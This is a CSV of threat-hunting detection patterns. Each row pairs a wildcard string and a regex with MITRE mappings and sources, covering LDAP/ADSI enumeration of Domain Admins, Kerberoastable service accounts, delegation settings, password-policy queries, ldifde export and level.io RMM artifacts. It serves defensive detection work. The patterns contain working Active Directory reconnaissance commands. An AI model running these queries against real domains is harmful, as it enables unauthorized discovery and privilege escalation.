"*(&(objectclass=group)(samaccountname=*domain admins*))*",".{0,1000}\(\&\(objectclass\=group\)\(samaccountname\=.{0,1000}domain\sadmins.{0,1000}\)\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Domain Administrators Group","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))*",".{0,1000}\(\&\(samAccountType\=805306368\)\(servicePrincipalName\=.{0,1000}\)\(!samAccountName\=krbtgt\)\(!\(UserAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(!msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.804\:\=24\)\).{0,1000}","greyware_tool_keyword","ldap queries","Kerberoasting","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))*",".{0,1000}\(\&\(samAccountType\=805306368\)\(servicePrincipalName\=.{0,1000}\)\(!samAccountName\=krbtgt\)\(!\(UserAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.804\:\=24\)\).{0,1000}","greyware_tool_keyword","ldap queries","Kerberoasting","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))*",".{0,1000}\(\&\(samAccountType\=805306368\)\(servicePrincipalName\=.{0,1000}\)\(!samAccountName\=krbtgt\)\(!\(UserAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","Kerberoasting","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*([adsisearcher]'(&(objectCategory=computer)(!(primaryGroupID=516)(userAccountControl:1.2.840.113556.1.4.803:=524288)))').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(\&\(objectCategory\=computer\)\(!\(primaryGroupID\=516\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\)\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all servers configured for Unconstrained Delegation","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*([adsisearcher]'(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(\&\(objectCategory\=computer\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=8192\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all Domain Controllers","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://web.archive.org/web/20240109000256/https://cyberdom.blog/2024/01/07/defender-for-identity-hunting-for-ldap/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*([adsisearcher]'(&(objectCategory=user)(!(samAccountName=krbtgt)(servicePrincipalName=*)))').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(\&\(objectCategory\=user\)\(!\(samAccountName\=krbtgt\)\(servicePrincipalName\=.{0,1000}\)\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Search for user accounts with SPN but not TGT accounts","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*([adsisearcher]'(adminCount=1)').FindAll()*",".{0,1000}\(\[adsisearcher\]\'\(adminCount\=1\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Search for all objects with AdminSHHolder","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*([DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Domains*",".{0,1000}\(\[DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\)\.Domains.{0,1000}","greyware_tool_keyword","ldap queries","Queries for domain level and mode information","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*([DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).Sites | *",".{0,1000}\(\[DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\)\.Sites\s\|\s.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of AD Forest Sites","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).FindAllDomainControllers() | Select-Object -Property *",".{0,1000}\(\[System\.DirectoryServices\.ActiveDirectory\.Domain\]\:\:GetCurrentDomain\(\)\)\.FindAllDomainControllers\(\)\s\|\sSelect\-Object\s\-Property\s.{0,1000}","greyware_tool_keyword","ldap queries","querying all domain controllers with detailed properties","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()*",".{0,1000}\(\[System\.DirectoryServices\.ActiveDirectory\.Domain\]\:\:GetCurrentDomain\(\)\)\.GetAllTrustRelationships\(\).{0,1000}","greyware_tool_keyword","ldap queries","get all trust relationships in the current domain","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*(Get-ADForest).Domains | %{ Get-ADDomainController -Filter * -Server $_ }*",".{0,1000}\(Get\-ADForest\)\.Domains\s\|\s\%\{\sGet\-ADDomainController\s\-Filter\s.{0,1000}\s\-Server\s\$_\s\}.{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all of the domain controllers for all domains in a forest","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","6","N/A","N/A","N/A","N/A"
"*(msds-supportedencryptiontypes=0)(msds-supportedencryptiontypes:1.2.840.113556.1.4.803:=4)))*",".{0,1000}\(msds\-supportedencryptiontypes\=0\)\(msds\-supportedencryptiontypes\:1\.2\.840\.113556\.1\.4\.803\:\=4\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","used by Rubeus and S4UTomato tools","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*(objectCategory=person)(objectClass=user)(serviceAccount=TRUE)*",".{0,1000}\(objectCategory\=person\)\(objectClass\=user\)\(serviceAccount\=TRUE\).{0,1000}","greyware_tool_keyword","ldap queries","Query to find service accounts which are typically high-privileged and targeted for privilege escalation","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/mthcht/ThreatHunting-Keywords","1","0","N/A","N/A","8","5","425","51","2024-08-24T11:38:32Z","2023-05-16T15:38:26Z"
"*(objectclass=group)(samaccountname=domain admins)*",".{0,1000}\(objectclass\=group\)\(samaccountname\=domain\sadmins\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate Domain Admins","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*(userAccountControl:1.2.840.113556.1.4.803:=524288)*",".{0,1000}\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=524288\).{0,1000}","greyware_tool_keyword","ldap queries","Accounts Trusted for Delegation","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://gist.github.com/jsecurity101/9c7e94f95b8d90f9252d64949562ba5d","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*[ADSI]* | Select-Object -Property *lockoutDuration*",".{0,1000}\[ADSI\].{0,1000}\s\|\sSelect\-Object\s\-Property\s.{0,1000}lockoutDuration.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Password Policies","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[ADSI]* | Select-Object -Property *lockoutThreshold*",".{0,1000}\[ADSI\].{0,1000}\s\|\sSelect\-Object\s\-Property\s.{0,1000}lockoutThreshold.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Password Policies","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[ADSI]* | Select-Object -Property *minPwdLength*",".{0,1000}\[ADSI\].{0,1000}\s\|\sSelect\-Object\s\-Property\s.{0,1000}minPwdLength.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Password Policies","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[ADSI]*LDAP://CN=Domain Admins*| ForEach-Object {[adsi]""LDAP://$_""}; *.distinguishedname*",".{0,1000}\[ADSI\].{0,1000}LDAP\:\/\/CN\=Domain\sAdmins.{0,1000}\|\sForEach\-Object\s\{\[adsi\]\""LDAP\:\/\/\$_\""\}\;\s.{0,1000}\.distinguishedname.{0,1000}","greyware_tool_keyword","ldap queries","enumeration of Domain Admins group members","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[ADSI]*LDAP://dc=* | Select -Property pwdProperties*",".{0,1000}\[ADSI\].{0,1000}LDAP\:\/\/dc\=.{0,1000}\s\|\sSelect\s\-Property\spwdProperties.{0,1000}","greyware_tool_keyword","ldap queries","get LDAP properties for password settings directly","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))""; $users = $searchUsers.FindAll(); $userProps = $users.Properties; $userProps | Where-Object {$_.description}*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\)\""\;\s\$users\s\=\s\$searchUsers\.FindAll\(\)\;\s\$userProps\s\=\s\$users\.Properties\;\s\$userProps\s\|\sWhere\-Object\s\{\$_\.description\}.{0,1000}","greyware_tool_keyword","ldap queries","find user descriptions in Active Directory:","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2))""*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\"".{0,1000}","greyware_tool_keyword","ldap queries","find all disabled user accounts","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2560)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))""*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2560\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\)\"".{0,1000}","greyware_tool_keyword","ldap queries","get a count of all inter domain trust accounts","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[adsisearcher]""(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))*",".{0,1000}\[adsisearcher\]\""\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=32\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\)\).{0,1000}","greyware_tool_keyword","ldap queries","Detection of all accounts with 'Password Not Required'","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[adsisearcher]'(&(objectCategory=computer)(primaryGroupID=516))').FindAll()*",".{0,1000}\[adsisearcher\]\'\(\&\(objectCategory\=computer\)\(primaryGroupID\=516\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all Domain Controllers","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://web.archive.org/web/20240109000256/https://cyberdom.blog/2024/01/07/defender-for-identity-hunting-for-ldap/","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A"
"*[adsisearcher]'(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))').FindAll()*",".{0,1000}\[adsisearcher\]\'\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=32\)\)\'\)\.FindAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Enumerate all accounts that do not require a password","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://jsecurity101.medium.com/uncovering-adversarial-ldap-tradecraft-658b2deca384","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*[adsisearcher]*(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=66048)(!(userAccountControl:1.2.840.113556.1.4.803:=2))*",".{0,1000}\[adsisearcher\].{0,1000}\(\&\(objectCategory\=person\)\(objectClass\=user\)\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=66048\)\(!\(userAccountControl\:1\.2\.840\.113556\.1\.4\.803\:\=2\)\).{0,1000}","greyware_tool_keyword","ldap queries","ADSI query to retrieve all active user accounts with non-expiring passwords","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers*",".{0,1000}\[System\.DirectoryServices\.ActiveDirectory\.Domain\]\:\:GetCurrentDomain\(\)\.DomainControllers.{0,1000}","greyware_tool_keyword","ldap queries","Discover all Domain Controller in the domain using ADSI","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://adsecurity.org/?p=299","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().GlobalCatalogs*",".{0,1000}\[System\.DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\.GlobalCatalogs.{0,1000}","greyware_tool_keyword","ldap queries","Discover all Global Catalogs in the forest using ADSI","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://adsecurity.org/?p=299","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().RootDomain.PDCRoleOwner.Name*",".{0,1000}\[System\.DirectoryServices\.ActiveDirectory\.Forest\]\:\:GetCurrentForest\(\)\.RootDomain\.PDCRoleOwner\.Name.{0,1000}","greyware_tool_keyword","ldap queries","query for the primary domain controller within the forest","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*get-ADComputer -filter { PrimaryGroupID -eq ""516"" } -properties PrimaryGroupID*",".{0,1000}get\-ADComputer\s\-filter\s\{\sPrimaryGroupID\s\-eq\s\""516\""\s\}\s\-properties\sPrimaryGroupID.{0,1000}","greyware_tool_keyword","ldap queries","cmdlets to get computer information about Domain Controllers","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://adsecurity.org/?p=299","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*Get-ADUser -filter * -Properties SamAccountName, PasswordNotRequired | where { $_.passwordnotrequired -eq ""true"" } | where {$_.enabled -eq ""true""}*",".{0,1000}Get\-ADUser\s\-filter\s.{0,1000}\s\-Properties\sSamAccountName,\sPasswordNotRequired\s\|\swhere\s\{\s\$_\.passwordnotrequired\s\-eq\s\""true\""\s\}\s\|\swhere\s\{\$_\.enabled\s\-eq\s\""true\""\}.{0,1000}","greyware_tool_keyword","ldap queries","identifying accounts with 'Password Not Required","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*Get-ADUser -properties * -filter {(lastlogondate -notlike ""*"" -OR lastlogondate -le $90days) -AND (passwordlastset -le $90days) -AND (enabled -eq $True) -and (PasswordNeverExpires -eq $false) -and (whencreated -le $90days)}*",".{0,1000}Get\-ADUser\s\-properties\s.{0,1000}\s\-filter\s\{\(lastlogondate\s\-notlike\s\"".{0,1000}\""\s\-OR\slastlogondate\s\-le\s\$90days\)\s\-AND\s\(passwordlastset\s\-le\s\$90days\)\s\-AND\s\(enabled\s\-eq\s\$True\)\s\-and\s\(PasswordNeverExpires\s\-eq\s\$false\)\s\-and\s\(whencreated\s\-le\s\$90days\)\}.{0,1000}","greyware_tool_keyword","ldap queries","querying accounts that have not been logged into for over 90 days","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/swarleysez/AD-common-queries","1","0","N/A","N/A","8","1","5","3","2020-05-24T03:23:09Z","2020-03-10T19:43:51Z"
"*powershell*[adsisearcher]*(objectcategory=group)*findAll()*",".{0,1000}powershell.{0,1000}\[adsisearcher\].{0,1000}\(objectcategory\=group\).{0,1000}findAll\(\).{0,1000}","greyware_tool_keyword","ldap queries","Red Teams and adversaries may leverage [Adsisearcher] to enumerate domain groups for situational awareness and Active Directory Discovery","T1087 - T1087.002 - T1018 - T1069 - T1069.002 - T1069.003 - T1133 - T1139","TA0007 - TA0009","N/A","N/A","Discovery","https://research.splunk.com/endpoint/089c862f-5f83-49b5-b1c8-7e4ff66560c7/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*ldapsearch * ldap://*",".{0,1000}ldapsearch\s.{0,1000}\sldap\:\/\/.{0,1000}","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","N/A","greyware tool - risks of False positive !","6","10","N/A","N/A","N/A","N/A"
"*ldapsearch -x -h * -s base*",".{0,1000}ldapsearch\s\-x\s\-h\s.{0,1000}\s\-s\sbase.{0,1000}","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","N/A","greyware tool - risks of False positive !","6","10","N/A","N/A","N/A","N/A"
"ldapsearch -h * -x*","ldapsearch\s\-h\s.{0,1000}\s\-x.{0,1000}","greyware_tool_keyword","ldapsearch","ldapsearch to enumerate ldap","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://man7.org/linux/man-pages/man1/ldapsearch.1.html","1","0","N/A","greyware tool - risks of False positive !","6","10","N/A","N/A","N/A","N/A"
"*ldifde.exe -f *\temp\*.txt -p subtree*",".{0,1000}ldifde\.exe\s\-f\s.{0,1000}\\temp\\.{0,1000}\.txt\s\-p\ssubtree.{0,1000}","greyware_tool_keyword","ldifde","using ldifde.exe to export data from Active Directory to a .txt file in the Temp directory","T1018 - T1005 - T1077.001","TA0007 - TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","5","5","N/A","N/A","N/A","N/A"
"*aigmfoeogfnljhnofglledbhhfegannp*",".{0,1000}aigmfoeogfnljhnofglledbhhfegannp.{0,1000}","greyware_tool_keyword","Lethean Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* ./level-darwin-bundle-amd64.pkg*",".{0,1000}\s\.\/level\-darwin\-bundle\-amd64\.pkg.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ./level-linux-amd64 *",".{0,1000}\s\.\/level\-linux\-amd64\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* ./level-linux-arm64 *",".{0,1000}\s\.\/level\-linux\-arm64\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* /F /TN ""Level\Level Watchdog""*",".{0,1000}\s\/F\s\/TN\s\""Level\\Level\sWatchdog\"".{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* downloads.level.io*",".{0,1000}\sdownloads\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*""message"":""ably connection state: CONNECTED""}*",".{0,1000}\""message\""\:\""ably\sconnection\sstate\:\sCONNECTED\""\}.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*$env:LEVEL_API_KEY = ""*"";*",".{0,1000}\$env\:LEVEL_API_KEY\s\=\s\"".{0,1000}\""\;.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*$tempFile = Join-Path ([System.IO.Path]::GetTempPath()) ""install_windows.exe"";*",".{0,1000}\$tempFile\s\=\sJoin\-Path\s\(\[System\.IO\.Path\]\:\:GetTempPath\(\)\)\s\""install_windows\.exe\""\;.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/level/config.yaml*",".{0,1000}\/etc\/level\/config\.yaml.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/level-windows-amd64.exe*",".{0,1000}\/level\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/level-windows-arm64.exe*",".{0,1000}\/level\-windows\-arm64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/local/bin/level*",".{0,1000}\/usr\/local\/bin\/level.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
